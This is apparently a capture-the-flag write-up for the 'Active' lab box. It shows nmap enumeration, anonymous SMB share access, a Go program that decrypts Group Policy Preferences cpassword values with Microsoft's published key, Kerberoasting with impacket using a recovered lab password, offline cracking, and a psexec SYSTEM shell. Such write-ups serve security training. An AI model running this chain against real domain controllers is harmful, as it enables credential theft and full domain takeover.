# Active (Easy)

## Enumeration

### Nmap

```
nmap -sC -sV -oA nmap/10.10.10.100 10.10.10.100
```

```
Nmap scan report for 10.10.10.100
Host is up (0.13s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-07T15:01:24
|_  start_date: 2021-07-07T05:25:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  7 11:01:33 2021 -- 1 IP address (1 host up) scanned in 89.52 seconds
```

Kerberos (88), LDAP (389/636/3268/3269), DNS and SMB on one host with the LDAP banner naming the domain **active.htb** mark this as a domain controller. With no web service in sight, SMB is the first place to look.

### SMB

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg5hStvCvETj5tLJEJC%2Fimage.png?alt=media\&token=310684c7-1329-4e12-9c3c-5a559148dd6f)

As we can see, we can log in anonymously (null session) to the machine's SMB shares.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg68xvpunfYK75ACWti%2Fimage.png?alt=media\&token=382cc49b-c2a9-4423-8390-f6131dea3e88)

The Users share, however, is not readable with the anonymous login.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg5hezVSwsqjctLDFDO%2Fimage.png?alt=media\&token=9910500a-2313-49da-9b51-e7a8e99f0fe8)

The Replication share is readable, and inside it there is a directory called **active.htb** with a tree of files under it, laid out like the domain's SYSVOL share (Policies, machine preferences and so on).

We can use smbget to recursively download everything in the share:

```
smbget -R smb://10.10.10.100/Replication
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg5iInnCKSwLvrnZ1Zl%2Fimage.png?alt=media\&token=a06f3cae-27f5-458d-8fb0-a346283bcfc1)

Inside the downloaded tree there is a file called Groups.xml, a Group Policy Preferences file used to create or update local accounts on domain machines.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg67cMfk9duzwjunFcz%2Fimage.png?alt=media\&token=eece6d05-d858-46d4-b03e-b82bee565f34)

We can see that it sets the user name active.htb\SVC\_TGS and stores the password in a `cpassword` attribute.

The `cpassword` value is not a hash. GPP encrypts it with AES-256 using a single fixed key that Microsoft published in its own documentation (the weakness addressed by MS14-025, which stopped new policies from storing passwords this way but did not clean up existing files). Anyone who can read the XML can decrypt it, for example with this [github repository](https://github.com/t0thkr1s/gpp-decrypt).

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg68YKReBt7WENh_Rfv%2Fimage.png?alt=media\&token=7ef93aab-8e55-4a18-a3c1-04762e16550d)
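To show what the decryption tool actually does, here is an added stand-alone reimplementation of the GPP `cpassword` transform in Go using only the standard library. It is not code from this writeup or from the gpp-decrypt repository. The AES key is the one Microsoft published; the sample value in `main` is constructed here by re-encrypting the password this box's Groups.xml yields, not copied from the file, so the block runs offline.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Fixed AES-256 key Microsoft published for Group Policy Preferences
// cpassword fields (MS-GPPREF 2.2.1.1.4 "Password Encryption").
// Because the key is public, a cpassword offers no real protection.
const gppKeyHex = "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"

func gppKey() []byte {
	k, err := hex.DecodeString(gppKeyHex)
	if err != nil {
		panic(err)
	}
	return k
}

// pkcs7Unpad strips PKCS#7 padding, rejecting anything malformed.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of AES blocks")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("bad padding length")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding bytes")
		}
	}
	return b[:len(b)-n], nil
}

// DecryptCpassword recovers the clear-text password from a cpassword
// attribute: base64 (Windows strips the '=' padding), AES-256-CBC under
// the public key with an all-zero IV, PKCS#7-padded UTF-16LE text.
func DecryptCpassword(cpassword string) (string, error) {
	if m := len(cpassword) % 4; m != 0 {
		cpassword += strings.Repeat("=", 4-m) // restore base64 padding
	}
	ct, err := base64.StdEncoding.DecodeString(cpassword)
	if err != nil {
		return "", fmt.Errorf("base64: %w", err)
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(gppKey())
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	pt, err = pkcs7Unpad(pt)
	if err != nil {
		return "", err
	}
	if len(pt)%2 != 0 {
		return "", errors.New("plaintext is not UTF-16LE")
	}
	u := make([]uint16, len(pt)/2)
	for i := range u {
		u[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// EncryptCpassword is the inverse transform (what Windows does when the
// GPP XML is written). It is here only so the example can build its own
// sample value offline instead of shipping a value copied from the box.
func EncryptCpassword(password string) string {
	var pt []byte
	for _, c := range utf16.Encode([]rune(password)) {
		pt = append(pt, byte(c), byte(c>>8))
	}
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	pt = append(pt, bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, err := aes.NewCipher(gppKey())
	if err != nil {
		panic(err)
	}
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, pt)
	return strings.TrimRight(base64.StdEncoding.EncodeToString(ct), "=")
}

func main() {
	// Constructed sample: the password this box's Groups.xml yields,
	// re-encrypted locally so the block runs without the original file.
	sample := EncryptCpassword("GPPstillStandingStrong2k18")
	pw, err := DecryptCpassword(sample)
	fmt.Printf("cpassword=%s\npassword=%q err=%v\n", sample, pw, err)
}
```

Two details trip up hand-rolled decryptors: the base64 in the XML has its `=` padding removed and must be re-padded before decoding, and the plaintext is UTF-16LE, so a password that looks like garbage with NUL bytes between letters has simply been decoded as ASCII. The zero IV and fixed key also mean identical passwords produce identical `cpassword` values across every policy in the forest, which is a quick way to spot password reuse in SYSVOL.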

With the recovered SVC\_TGS credentials we can now log in to the Users share over SMB.

## User

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg69L4AFkXC42qigTrq%2Fimage.png?alt=media\&token=0ae3b558-97fe-4f30-8bb1-e20114862dba)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6QKdNmCNMVJNGHQBT%2Fimage.png?alt=media\&token=f2c888c1-c842-46a6-a4cb-e4fcf5688ebe)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6QUq65-ZKIS5qTUvZ%2Fimage.png?alt=media\&token=1170df1e-0e5d-4bd7-8dee-4bcb32d78276)

## Privilege Escalation

### GetUserSPNs

With a domain account in hand we can Kerberoast. Any authenticated user may request a service ticket for any account that has a Service Principal Name, and that ticket is encrypted with a key derived from the service account's password, so it can be cracked offline. Impacket's GetUserSPNs lists those accounts, and with `-request` it asks the DC for the tickets and prints them in a crackable format. On this box the Administrator account has an SPN, so we get a ticket tied to the Administrator password:

```
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6TvMiI-jSb2N2SywJ%2Fimage.png?alt=media\&token=e877e45c-fce4-44a9-a176-6c8871cdea23)

We then save the ticket hash to a file and let John the Ripper crack it with a wordlist.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6UIP5gVu_ev1Y3uVF%2Fimage.png?alt=media\&token=62d28784-c9eb-4ef9-ae39-5ffde5dd628f)

John recovers the Administrator password.

We then use impacket's psexec with those credentials, which drops a service binary on the DC and gives us a shell running as SYSTEM:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6VeaPgAf8UU17vMd_%2Fimage.png?alt=media\&token=8cca272b-3728-47cf-a84a-9dcf357560bc)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6VyRGCk0v1LU2P39n%2Fimage.png?alt=media\&token=6d4a2646-5f5e-4b9a-af6c-e8a7113bd1b9)

Got ROOT!
